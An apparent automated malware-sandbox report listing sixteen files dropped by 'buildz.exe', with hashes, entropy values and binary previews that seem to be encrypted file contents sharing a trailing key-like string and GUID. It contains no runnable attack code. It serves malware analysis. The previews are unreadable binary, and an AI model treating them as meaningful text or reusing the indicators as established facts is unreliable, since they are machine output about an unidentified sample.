                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):807
                        Entropy (8bit):7.746545614706404
                        Encrypted:false
                        SSDEEP:24:FWpbdAMbMPjoZmk+V/14WCiDE4yxS9t8h5JOzowGbD:FGbWMYcYkeUhST8/JTwUD
                        MD5:3464C499E6BFD21FBC9122E09C857A69
                        SHA1:0CBB5409B95838128EF1571E32058B26C225C59D
                        SHA-256:69309E2CBA3AB49ADBEED626E7D7D7353CBC50FC25D91A9DEAA8601C515214CC
                        SHA-512:986EE72B82498CD16B334315DAA7D6F527960351B0FB6C604D940B6BBC1210410A195577200FC8F3D6CDB2509DC39DA3AEFF70A0A871FC9D3E0427633999498D
                        Malicious:false
                        Preview:<?xml."d.B.A......U'.'9.Zx.}U./....|'..o...)..=....-.;.J..v.Oa.t.....(Iv..qh...J...]..t.&......V..F. .R.H.c.9..w.3n{cW.l.7.....[....I.7.............*..=W....Jm..|Di.Mv$.e#s.......u~.mH.3.i......9c.j.....].8..$...<...<.H&,.C.Z........J."7H..tctc.I|..m...Ip...`...R."..........#}..<.....).....`MEGJ.b.Z..2<..[4...... Q....K.345K...D...-P...U...(...\u......y*o..0....?...S..<lN.E..ipf..~.........8.|}.p.....6..tU.%....].....3........&..b.Z"$.Go.d~...q..1...qR.....c.X..f.-.F.T..#...{..3.....98.....s.^._.p....vw...,Y..M03......u.t.u...t_Mau*...e...j.?..0.....0....(...@.f+?..z.z..c...t....83'H?R.....x..w5J";.w.s..:/.J%...}..>.^W@$..0.xynQ..'..}>..}..l.f.1>.-.!R[...|..[...G..io\V`.{....../.....8.=..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):741
                        Entropy (8bit):7.708252161298773
                        Encrypted:false
                        SSDEEP:12:6JfmC2rj5BlLTX0IklnGn3fsX73GrrKNx4v862hgYA2SMLM8KF04QUax17e0RDQX:6QTJHn0ZMn3C72yHprAf8PUE9lQhNqGX
                        MD5:C0E3DDDC809E87C3653C1414FCFFB1DB
                        SHA1:365F13E30923BAB7C24D5E55AAB6D10161F55CB4
                        SHA-256:59DC324BCFB263ACDFD88F8FDBDC1F45498D943741D5E30B10C8F02D94A3D6DF
                        SHA-512:9AF847234E143826B4CBBE5BC174CCC318E29B458E7E02A43FBB605E171608E678AFBD3C88BE6937EB41C315246D4D7CA0524F2D15BA6BB081E68AAB6BF96E1A
                        Malicious:false
                        Preview:<?xml.F...q....h|..T.n.v!i......). .]9f.;.....'.e...kTs.E.y..x........ '.[.Uk..e...]...N.%F.......L.....+..2.*6g...DL.y.gH....^....'s..`.....4:.=..q.k.....@D...V'/%.L.g.B...A.].%...u...^....7...'q.s..!kat.On.Y.A...D.l.I...;:...W...G._.>.:K..R.n`.'..2]..Q.A.t.h..G.p.fQ.e.....7....e..^...^v..$......eY.E."x2E.........&8`.)z.Ak..Y]hm....\.(B..W.O.P.7..W$\.6J#8f..}.....8i!|4.8 .a.}%0W.g.E..i.cd.n.7....).v..D.o.t."~.c....l...W-.y....F^.=..Q.Hw;ra.(.y.<..-E.....,.Q.t.G.. ...00.p\.....<....5}..S.Nu.V....d..1!..'..O+.?o..^..............I...j.G..%#...z...g...$'..Mpx.5...\.y.QH.&_bsP.{......u.kh(.Q.8..)Dz....q.fz..@C....}.2AQ.,J...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):802
                        Entropy (8bit):7.717481485498594
                        Encrypted:false
                        SSDEEP:24:kS+wnqk3eE4VMiUQ+p5lM7Mb+IN3npCu4GbD:n+gqk3sMlKG+IN3npl4UD
                        MD5:74FE0DE06A5F9EACAEBC6A27B55098D3
                        SHA1:F5B2F760DB23646A88D2A292BB4744146F358B56
                        SHA-256:4FC6DFB623DE1F1E9F9F2C24AC8ADA6B5B7DDC932E71573CD5A3EABCE198E9BD
                        SHA-512:F68E95367BFFA2E2177B913F8B14BA7A50A4725563F487EF2F7593FF4770B4B4431AAA02D18B403223A29FB7B6FC4F93E7B6EDD6C956CD1E9C64E4F284E70C6E
                        Malicious:false
                        Preview:<?xml.....Z.:nWC....!..T...}.)Z.\.Y.).4.pW.....y.1..j.n.8.=...e..7.yN..L....1.L].vv.m.A.9.!.....J.. #......z.....oZ........g...l..3..^..F...S...NheB.kL".\.`.T_.....Q.dz.R3a...N...fG<)..CU0. .:+..)D+.+T........\.J.}.3......... .lDT....^.~.../....V.,.......&P./.!.......].Ml......4'.:L..n^...)L..[....E..z.L.G.....A.!|.y....8...$...m....M...6e.._8.m...>?.$.}..."Lu..S..<G..M..G..m.$}.Y........E.\..%..#.6.Q`......B.......1o....u"...b.g.L..08.K.].=...O.b.,...0..S.G.......Cm...3.r....p.B.{1W...s....i..]...c_....JR...m.yY...l.VcLQ.~....6.vg.d=.R.m&.......b[W.._..0.....e@g.VY.7...T.=....F.2...u...|*.|TWI.."...c.ZP\go....#.4MBs..M=.S....9.l......../K.!N.yL.......!..ti]....Dpp....$..k...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):749
                        Entropy (8bit):7.708053045256629
                        Encrypted:false
                        SSDEEP:12:ZK41rPUijIWO7ziq52RHk7fLuKF2bWJnkzKnLqMopxiy/26Gcii9a:T1rPUijIt7ePHk+KFogkGnLlYRGbD
                        MD5:69E0FB94814E522BC443546AAE3C4590
                        SHA1:138C63179FD64B1525E624892C20B5816EC96B28
                        SHA-256:7905720A0DCF1F81DF2218BF783707E0BB3788CCB12F735F6C7568CFE2958BEB
                        SHA-512:263108937366B1EB427499AC3BDFD947B5E6A88518A1B5DAD9161348C8C948CE0BAC4A6B6797B1F649E71A1B990D4FE6DF4DE2ED657CAB31EBE574242D937161
                        Malicious:false
                        Preview:<?xml..#7s..x..!.M.B....!.Y.k,iNg.y.I...|R...~....@.S.k..<e..R.........O.Va.;TP,......a.=.@....Tj.[.......A{.B.1..Ws=..a..CB..}].Ah..CU.m`..r......9.s..Pv/D. 2C..O...........L...F..|Z.$.~..Q.A.....c.w2f..x.m...p~.4_....rl.1Z...sI0..}'..0.z.p.=.J....e.U.D...a..a..a.4OP....K.@....@.L{.b7WZ.C.....dl...@.l..W .?..DH.Q.x...^..%}.Y...h|i.d.....5.\y......'V3.,....`.QG..t..w.[.`.........[...Ud..{7S0.*..b....q..UQW..5.....Qy$!\.v.[......`.;..`..O.f..3..^Y.P.i..s.F.=.D....P,3....E.t.._p..V.L..9.G.&......+%.P.....{...].....1c..$............?.u$.w.,......6.y....!..,.f.<u...Y..MR..jY.5.<n.K.q.1..ZU..*.s....)......&.t'.EQ..>..ZR.p..../..w.*...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):805
                        Entropy (8bit):7.745247977700882
                        Encrypted:false
                        SSDEEP:12:sWacjdYhyFnJGHEMX2c3vMtp062oR27eA8ZwTENTWnEDl9CM+bOOKgil3HYlu82b:QE2KIHEttx2NR8Gg0y9CMWO5XYluOGbD
                        MD5:7802CB2D5EFD5E744D9BF966015126D2
                        SHA1:C9197FBF3031FA2F8ACA22B7F0BE71B673536703
                        SHA-256:447031C1B1B5E9D4F1FE1EAB30E532401208EE6AC3DF889AB567F87BA27930CF
                        SHA-512:FA9D6F89E60F3EFA20C24F292C5F52C8C174E1DC5DF8BDAF86B5FCCBA6C1D41ED6D3B65C32889F554A23A1D2B1ED83621273A0956D5C58A3033032A496B0778F
                        Malicious:false
                        Preview:<?xmlQ....R$..&^..k..NswA|Wb0ve..I...Al..(.d(V.1k...7.L..GI...&da.:7j. -<..k..Uu..H.......B./wu.c.5..W..:J.D.#...y....P.onNz..QE.z.t.$4..42?...v%...t..Y.<,)O.....N.[.......!._....5.m.#6.b.>...D....,.A..a./..|.......[iJ........5...$...W..C...q9L.Z.>.".D......,d.P'.f......r.....).......$.... <L\>91..r.C.3j...q.}=...y..\...8.b...U..6......iv#.0...8.>..K......w-...!..q.W...1...z....+]DX..WvU<$g..-.h_3..ax.8z.......?tHG.....H7>..|P..Rg..|..).!8..<.Y+..q...0.F....'....Z{..lA/.Z....1....'.N.....YW..y..`.h\...Z_I....".2^.=.V.x8...9.0%...;.k..2.}LfQu..-y2.."...7oL|}..Ow6l.!.....?z..j....H...A}.9.w.[>@...........@..........,."..B.y......^dM..!..(G.......1.%Q....3..>.[;....U...h.J.g..Z).0KEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):765
                        Entropy (8bit):7.72784739474487
                        Encrypted:false
                        SSDEEP:12:sIy9jInE5UjJLfkJWw0aszXaP2fXJANYkVrYEAThzMmnkq7UIRNywYKkD2Vm/26A:CjInEKCJuasOP2PJnkVrYEAThzkUlNrf
                        MD5:01292F5B2E0D20CE52DBC230221DECD3
                        SHA1:33205E3F3138AC1369B4BC573ADE0471172450B6
                        SHA-256:8B1D72A515F4EEB876B619D6C2F33082F2457C73DF285196508503ACE0AAFD32
                        SHA-512:A72D42D4D6C8981B1DEAAD7E5BF252BA6344611F9696F0D4C91EC3D8FE2C8161D05F9F374A8CC614EA43BA3FCC075D841AFB0BBF552679D3B020DB764062FD0B
                        Malicious:false
                        Preview:<?xml..J{...kT...@.;.-.A....n\Wt...m..]....(...Y...O.0p..\....n.1..|;qw......"w8.p.Y*(y.......q..y....O....G6@....;t..y[~pC...a.S....u.x..B[L..}........B.J.....mw}..%.L/....X.v.......WCIu.a.Q...........Y.L...Kh...........Id.O........._...N...b....O..H......K..r.Z.:...6...*^.zg.;{......]...O....R....)b.-.L|..h.Bs..O....._.N>T..j...~./,.L.\^...!.$.".0..q.....m...e.....:?[.m..B).~.g}O.o]&3-......"..A...v...;s}*xM...,...{..7..".%..) K...!..(K..,A.CB..:..B=).q........]@.G=..3.......(L,...z>....[.......~...l'.2)X....Y}....B......k6.*8./PU..t...e.........i.}2^..X.O.#.......F...y.(....P.. ....b.......8A.l?....M..v._E..V.>...Q..3..>......J..q.J.,).]...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):808
                        Entropy (8bit):7.6952463019867725
                        Encrypted:false
                        SSDEEP:12:QOfu6sqY9hYBgeVgoqPoSMujtmGsKuGv3r51N7oGtyMbJo68bVLAYgvTnemr26GX:Dm6YkBgeVz+U0bpryGtfb8sjTeWGbD
                        MD5:8D8B2C636DB3C648278BF60004AAEF08
                        SHA1:078B32582E67D23E2A79566A7895F4A2A3055FBD
                        SHA-256:78175469F1F9E67BF70DA8AD3704881FB7C2DDE1B6184C49469462E23CBA67DC
                        SHA-512:373D58746D352BDFA5E0227B4E27E1D8069E97EAE2BE0023B6BC72E7B0125C70C99FED496EFEC94B4BFECAB692534383859830B96969663A5A0848876FE5B146
                        Malicious:false
                        Preview:<?xml@2...$D.%p=...O#.-.....^.V.L.loEe....2..P.0.u|(.. $..u........6=......>t....L./..1..*.ap..u.p.K..`...y.L.6._.v.1[.J..b.H.Na..".....X.D/_Q.e....&...u.S.I.J$.J..;...1.nt.....9.^.F...R..({.+.Ct........OV.w..O.....qV<.z..f.TD.:.3......V.q..c...........l.6..:!_....T...Q...<..;.....a...P......Il.y....6...%*.#..R..B..=.(...0&.J.........uE}...bZ..<.0.b.9.z*..Ir.%^...2|.*?...h.....vX.#.........U}F.>..f...%|.*...j..W4Q.z...-.....qa.[q......D.e;...v2.....2..;y4..8.g]X....K....9N..@.....D.*3..C.e.k...)a...7#ud(*h...*...Ha..c0..6..l*...2.l..=-m..:........U.?75.r.e....k.H.t........@.p.$.Qo.;......$.%8gr+#...j.i..QSI.....K.zR.. ...q...r...0...c.....C..sd.\.BR.+/..*... ..C..._.D;...C.j5[.9...U.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):760
                        Entropy (8bit):7.724293229132904
                        Encrypted:false
                        SSDEEP:12:8UisMBjsK/9uNdjSybadQkN/+U+bbYQqUn6TrQ3BrBuzbysd126Gcii9a:pisMRsKQ7a+kd+tbthCrin0bys3GbD
                        MD5:867BD681610BDDB6620AADC4284060B9
                        SHA1:0ED01F4540D704280CC2C849BEC7AEC418F4CEFE
                        SHA-256:C20D2C86D4AE7479AAA3C00EA13540073C7B8F63FBB8202A41ACF6BB768596CB
                        SHA-512:8FB8151CADCF662EF9E54FDDD12ED8E063AD75EE8F3CE19DEAFA87FF8177C9411C989AB698483D9D9F66F846BAEF012C2AE94B3909954059D47A8D817AB216E0
                        Malicious:false
                        Preview:<?xml.F..3.=dS...`]s.7h...bsxK=.+AR`.....-.Z......D.".F...M......(...s.......\..2-3.p.u.K....1..B....6@...+...W....B.........?{wS../4...&+..R.)M....t....:.=.....('j.zq...L#..6....q.%.r1......I..r/.:.Tux.c.Q.+A.w..*...9....4"...{..-...~....o....;K .....3..v.nB..Y..'..t.tD.#..h.......$.,.}A..lN...`....X..c.....~`.W.-.L...q....G..R..hf#....\'......*.....>p.%..ktHW...._.Tq.`k....{x@....gaX`.+.g,..zM.tf...|bl..m.# .......(....0.(...........~i..>.i.N:6..\9.....7...H^..4.b.QLd.E-.L... X-@.k.r4D...+u.x......b;....B.....X-.K.#j.LA.....p;...G....A.08.FB.?0...8r_s....V$E..M.....hg.x..w.P.!..w.=*.E..n.d.Q0... .=l<)~..z....:|.9(.1nP....um..C...:....vt.]..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):807
                        Entropy (8bit):7.707440243102908
                        Encrypted:false
                        SSDEEP:12:D4pSKmDtMlCSgf06cOdlngZG5illzAF+6NQKYGk2+q6Z2rFHmjJLoaoP4AdX/26A:MDgf0dylgblf6OZzL+xHmjJJUd3GbD
                        MD5:2A17B9C33BAA9768BBA1D46B4D7E45F8
                        SHA1:DFDA04F7AE788952E005775FF0B1EEEEB08ADAC6
                        SHA-256:BF70F20D1DFE35F3A0007E705BAFF9EAE9E1320B4F339A2683678B296E77094E
                        SHA-512:F85F63C9344B629E41B8525AD4E01227BF90236417B60C6EA546817B53908455642453AF70B12F4AB3DEB127ED175D6E9682BC07776B23498FA21FAC68251644
                        Malicious:false
                        Preview:<?xml.a.t.F......*..U. vA..x.Cq.ug..`8&.h.%^.Tzp.......H...o....)M.8....a..v..seG.'T.eq...V...Q.Z.N..P.P..v.e...OJW.Kc.B...r...\.C_w'Q.p...6......@.\.x.....Q..$..i.y2..ub..N.v...FH.j.}U:.#.@xFRX...N.~u\..4v=...z...;9...:D.c...........i..."..... ....).~O+w.>.n.."..o.x...6a'.........(.P~2.1.."..R..-.{={N;.....#....W......8wJ.....3...."b.[..3 No.3...ad.......j.Z..)..+...g...J..M..-.....f.Au..f.-...r..p.8!.>S}7 ..U.p\..}2d......N.a.-.d..h{.r..N...a..NP.<.../V...1.@...........g.wj.{.;.M^5F.....6.e..h1.\l....2{O..iP.....X..v=sG......D..mP.(.W`.C.....-....PA....pAm..4,..u.I...*..C5.m..;.\.s~.9..VW..../..r.,?..P.\.Y..N[...|........2...........e..G...'...`.~..,...bA..G...z.`2^...!d1......O.....V.%dEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):752
                        Entropy (8bit):7.6865327080666335
                        Encrypted:false
                        SSDEEP:12:7q/upBEgerSs86bLlnDi1a/hOWQ51kpkNz9sLy+Rfm9WTaYn26Gcii9a:7q/ABEnSs86bLlnGa/hOWQIurYy+Rf1y
                        MD5:EA53C0102EF47C61E66810ED7A6A1D14
                        SHA1:57ABE2F84EB8B4131D7D1D58AAD67AC654818576
                        SHA-256:B5FA4B9F8BFC2A2304CDACE85D3F83395AFCF69AD44DB9A1133C1C5C0E8F5189
                        SHA-512:6C42418B84E5113763C06D70F1493E273F4E8D5005D2CF5B78427813928422D19CD7D3FD344287B2337677955BED1D8737BAA8241AEE12B265D102C1308DC3CD
                        Malicious:false
                        Preview:<?xml...T.1!}..J..s..f...e..c..........z.L.O.... Ke.e.{[.{....K..>...nR@.S.GH...!U..{.9.JJ....S..O.*.......NP.....;+C....E.D.._...P"...[../.'.s..o~...#..q`2b.V ..s}.36.^s%.......Q..c...e.7q.V....a1.@,..b{..Y..._.-...%....V.....}.|.3..xJ.-..hbw....dW....8...[..PU'...:.....H.N.7..w.7QH<.K..B. "...........P..NDZ..:...e,..[Y...O...b..6.3.."....a..`..r..u...bD..u..0..H.z......92h.....;g!.y..9VQ..~.h..p......a'#...J..M.j.W..I..7.U..1....\v>O.P&.....j..<,.0.p.H.{:}A..|.C...g...^......~!.....[.\.U.......k6.l.k.lMk...zO.v......b.3>.C<.3y.P.w.AL.Q.`@.K..C.....O.J6.y.... ...7.}.3.......2X.jW..xm.?<.&.b.......[..F........R...8...6....W..ku{*.t...\EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):805
                        Entropy (8bit):7.7256325119346485
                        Encrypted:false
                        SSDEEP:24:5MJdT3NlKZiRUf+ocE77mXGImnWPv3PAtoR52rU1GbD:6h3jgiRfoxJI/PvtKr4UD
                        MD5:4093CC957B150E42DEE155F7B788CEA0
                        SHA1:01B7F4DC761BF8011B5B67B7EB5DF93BEA553A46
                        SHA-256:5B95B942E79575D786FE3FB3B2D9EBEE55D66848D6DD6A21E447DA86CCB9BCC5
                        SHA-512:EC2C9E048491F4904CBFFA79FCFA155DC18E3819A9AE84B0F8538B14AD752D77625294DACFB88CB506696B5A17D502115C237882531159CAE13760C0FAE405F7
                        Malicious:false
                        Preview:<?xml.W......./..).D.....PG"fN.|.G...w=.y{{..K......V.....2..B._k.O......k..6?sgK.2....N....?...7.|..S.%J..h.}%#.....-...n..;....T.A.H.p.}7.....`.>...wC..6#..G.$....6.&72.`[..>!.... ...N5..U..YY..K..h.....w.....\...!;-..._.......m<.\.4.".v..E..n..w.U..Lb.#......EA'~qh.....hY.9..M.or.......GU..|=..?:.2(...)(..o.)`.9.J/.G.U.j...............$..h.2.qU...+...OR...M..6.....{....MJ.{!]dn.@$........._.....Mk.&.3I..@.wHqNeJ....2....Z.1.4G....M.=............N.K..?..C.>...b.ye.].......2.....|...}s=..O....:......Q..M.MS...C(...Z..%..4..<`.F.=..y0.V..f^9.......!.PT.DI....H........d.!.C.N..K.VU....:...n..a..A..e...^J.y..w.....}.>.]g...F...#..0&.Ij.x.."..z.qb_?.-...y...U(.._.+)n..W..H....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):738
                        Entropy (8bit):7.700626971206792
                        Encrypted:false
                        SSDEEP:12:XAYribIRFJhdqmQPib5f31vhOEAFbnz2+sW4YD3eVTi26Gcii9a:EY/q6b5flJOhF7zjR4HEGbD
                        MD5:DD775F8C14FB9EEEF7D7ADDAC35D172F
                        SHA1:523E00CEC57733389CCCB18FFAD02D2381DD54FC
                        SHA-256:A06B99BC1DC34E4162086B0AB5DE69186F93E95EB417650645FF2DF834A58220
                        SHA-512:2409B5BA6825090D3A909C59BF194902D84CD60B12FC01ED5FE9589FAC0A9942B7F3D464E7F37390AF64EF688566EA72B2A15541E32F8EC07757589A43E6792A
                        Malicious:false
                        Preview:<?xml.......7.T.6...~u....F.*......,...C...9$....G.&l.YQ9..v.^..!.....n......v3.%../...].......K.0..T.&.{5.d.g.....+L.V...JY.%.5]F.%1.Z...U....r.8.H*).... .&.O..........-..G....3y.H0q.WBGw3.SB...b....7.m......>...q.!So....I;...p....)j`bKw....{.....G..K...c.*.\...+.bp.I.x...0...:&.o..d..e.M..ok.UW..>=.K..Ex..?....u..g.b{.t.oAM..^`.dL...../.d........P....~.*...Wt.>x...q.h.v6......E.O.'L.n....`..".e..s9|.,|.'KI../Zu.*0..jD.a4d.b.7".....5MM].Kfd.%..#m..7m......`.;!.....]...ZN.......X6^..p"....S.q.hg.o....ySp:=.J..X5..N.C.-....y...:.=.."..?|.`..;.....o./.....4[*~-..3t.N....K..q..hQ...=...LsR.SC...q...c...........|.'..]..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):801
                        Entropy (8bit):7.674280538371522
                        Encrypted:false
                        SSDEEP:12:GKDGhD9KRFkEITIDs8TaJysV1p1MUC4032fDeyU4l7OKOMRnb1H0MDhy26Gcii9a:9Dq0FmTE3291p9Cbm7DNdrlQGbD
                        MD5:757B47F0BECC3DDC6A97F6865EDB3C9B
                        SHA1:CEB97D0776D40562710D96596F3092780034E85C
                        SHA-256:CB94C89325CC0B4020CD2938D4B62C4FA26998F35F758A9C739713930C117DFD
                        SHA-512:DB6B284D5CA7751A494912A44A69175CD04A671617F780493DF49B14ECDC78B04AD0174E537C663364EEA367920D6768B1E7803EC84BF483E6ECD4EA7B904393
                        Malicious:false
                        Preview:<?xml.. x..@.S.....4./.B}a..........3.........,...F..~2.F..ZXeH.V.>N.........l_t_.....I.A o%6A.1...-r.../.".w.../A...`....w.R.....t.N.(}B./iK.................)..k....z.....u1K5..X...S...N...9.......7:.;.l.."M......?:R..7geqN.{........y.d....1.SV.x!IW.*.&c`c..'!...+e.....c..oFM....P..]c...<v..:.A.E.rX..[=y...A.b....F..?&v..."..ai.[...:=[..iP.T.'.[..`....Q.....m.C....P.....|i.*.O@.....n]...A.7uG.r.v._#u..z.F.J.<.8?\.1....{..-.yT*.0|....8..M...]......(.U1?..U.O. s.K....n.p.._.J5jx....x..*.......!8.P.*../.S......|...A.zx|:..g.g.$hnWG.T%..(.F.-.!.1.uu|....%;....%Z.)..\S.2.4At.>..1.wv..#..I..r..!.V.....L|j\s.L....[..._..y.^ .-1P~.R...)....j.o]A(m...B.]..#_..X..a..-$..R...0y.x...VE..%v.8Vi.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):507
                        Entropy (8bit):7.513999601258194
                        Encrypted:false
                        SSDEEP:12:bElfI/bdoQ0pykLV7DWbKCibWK5rDxf3U/26Gcii9a:+ixotD9DWbBiBaGbD
                        MD5:4D4D53172E5D8EC060C7B968A086A5DA
                        SHA1:1FF7A38761116F432B535E87D4302105C873DAA8
                        SHA-256:A3179E9C4E4F61C1C021F484DE098A121C73A5F7F527E92B7CE99EC59C52DBD8
                        SHA-512:0C91BE94D349FB4B51674A660BC488B2CA1921BDCF759E70120F2D2D9FD7EF1BE0E9B630E0DB15C1258BE914202A936D547F0466BD39F1A01B8B6C5F04CEE305
                        Malicious:false
                        Preview:<?xml...Hq....b\I}b.....i,.XB.<.Q..].....=.....yHRF.A.......M.e..L..k2..&...N.;..'k......V.....>.....=.......ky..6..V.o.a.......I..yiCHo.!N..K.@H......i.#..(.............ui-.&........."...%B.R9Q...T.i.NO.U....@.........n..*.5...-jg...nm..%l.....-....{.9...~oMB..M.C>..L.*pu~oG.6CU.....A.9..3.c..!+_.|5,x..!.h......9Q..^....l....n..k&).0.$w,..8.&..8.....&Nh.K[^.(P...ma.s7..7......V.[....!...RrG......2..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2285
                        Entropy (8bit):7.930070505584508
                        Encrypted:false
                        SSDEEP:48:UrvQzdqqDrA5LBnBiEmXB52pN9Kdj5/v3l2ES28Sd2l2AKxouUD:YQBqCE5LBL2BwNK15/v3sEn8NlpKxhA
                        MD5:F9E66458BAF78B5EF72447E932CA1E95
                        SHA1:6889F93824E8A2BABD4F34BF06E7434D9526D745
                        SHA-256:40C5C57A8D54D859CCA59162DBBDC0B5C7E64BF26A70D42B70A2372484D25960
                        SHA-512:65B6AB2D6765B61E1F8F7B988391D583597784800EE133E21E28BA3F58FB1D73BE4D41DEB483585843D9B0B405B96228DD67972BAC136BC3925DED70E92DF25C
                        Malicious:false
                        Preview:<?xmlcx.r{.Mm1C...,Q....Cl8....+..+k......?>.3.]d.x......b`.+....&.%.T..c..5..W..o?...d..G./..d....p.ll....jt.nJI;<.h....AA[.59o.A....~.<.|e{IPY...V]@..mV..G..*...T.B.22d....5.$.5.\QppG*W-.........Yz4Yx...@.4.n'X{.....T..8*.;. . .6.;5.8su....C|.H.PSZ...{.$GE.\.J;.g.LD...3....r.S...!a...^..).`a^.@.l{....].Gk.-D...#;.2......(.J..Z..............;.<....6p..+a.2..q.%.kqe.P....N)k'.Y.;+.Q.O.c...V.....ix...<.L.8Vc...N .0.c.q..Y..g....0...)9.X$....>c.2.f..9..K..w.._....L.0/. !...-.:.4.M%.W/.J..X#...W{I.*a.OV..fd._..^...~......P$J.vK......~.....i.(q..e.q.RS.Z.......h~(.m....op..?p=....h...1.?...RAg.A.|..b..{<wl.+...58....a5....].@...-A..$.-WwfDEQ...9].NVy.n......H..+`.C.p......'.oc...&3}|`...OrDw..Nq]ws.._vt..HWY.>...b(,H.o.b.U}...t.....U.........5....#.p:.E.P6...."J......q..h..b....._....f...$....*u......x...7vJ...}&.>.....R!.....s.9".j.....k...<.,rE...(3.F..\....L.m..9..........Vv,.r....S..W..e..6..n}.P.....6x.I.*.9......W.3..2.........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1291
                        Entropy (8bit):7.832752246551643
                        Encrypted:false
                        SSDEEP:24:cfjPXShLy+/Dbjkm1+1wt0GjL1gOS5xPC7CkEkp96Sf8TGGbD:c7ah2E/kGzmGFLSfPgCk9p96DGUD
                        MD5:F8E9D96C6FA51F9D6E4B66D3E755BF06
                        SHA1:9B0970256D0F048D06355DB01B8D4B3EC7EA6E72
                        SHA-256:84F7D6F36DB52713A9E4F00331EFC638E38777A562D6D9FF3DD259C234878FFF
                        SHA-512:41642A6E4CC84B9855FC60BD8FE82B441F20337542EF82475A668753911061CF115E2F836B0A0FDC44229369EEFE7AC1264060B994C2C7CEFF8BEDA173230C5F
                        Malicious:false
                        Preview:<?xml..&..........r....#...l@)......X..'O.PA.^...s..B"..KA....J..\%.r..@....~W..1.qW.o.FP......S..R...F3....{..E.}].8k..u...gv....9....I....l..ER..0W..Ig,...n|.".F&.G<..k&VF|/.j^.[FN<.l.#.-p....$fAV.....m.=v@Fc)PH.a...a.....G...K.q..U.......".M.....E.9Q...A...uA..........|}.i....+.+...T..]\Kp.b.$.n.M..h........4.-8..je...nK.Y.r7.....X...Y...n+.....5...._e.:e.s.N#u...a...0FI"N..9lci...h11....Dc....Jn.4.iT.~./i..,.M........VQM`C...qh.;E... Q...c.G..+...T...]........8.o..5..k!.._.p.k....f......p.......7 .%f;&'...&-....TP.{.V.....o....B....r.p...U.zb.].. .t.....[...E..D.:BR....Iy.e.y..r.....3.....X..<~5B.I.2....PI...o9.w...RM.r.Q{F.....h.4:{.D.:`..K.}L..?...~w.M.y8U..l...U....9..iib.|.R...R..-s......:..y....S.#s...+C:r'.]"..=.....W}..@....A(G.D/b....M..M..L..J..'"2....c..?.c...v.........8.....v.@..N..U>.....A..J......t..&.'.dLc3n...3_R^.......@.q..a.k..%....V...F...t2o.f.q...#.........B.5.sl...s`%VP.....K.&..z...f....fc.A.W.....e.ht
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):834
                        Entropy (8bit):7.709810416221884
                        Encrypted:false
                        SSDEEP:24:3KMIZCiKZG0ucYWVi/yrRXYBrHWPsXwRwXKWGbD:31o10eWVIeYJHkwNUD
                        MD5:EA1D2C8C734605C0AB7AAD10BF3C89A9
                        SHA1:FEBFBAD8CC61CFBA4F041B9115AAABDA059BB5A4
                        SHA-256:65410F1FA4342F27E6294CDDD75F1B209E86763D63F765EA510A5A82247BECF6
                        SHA-512:2A74F9A98E1EABDF801749AC883F2E391405C372E54DDC73390D20A69D3067639C5C811B0A302388AA7D94F817133EA91EF313AE2B674C9F73ECA2E3B74860AC
                        Malicious:false
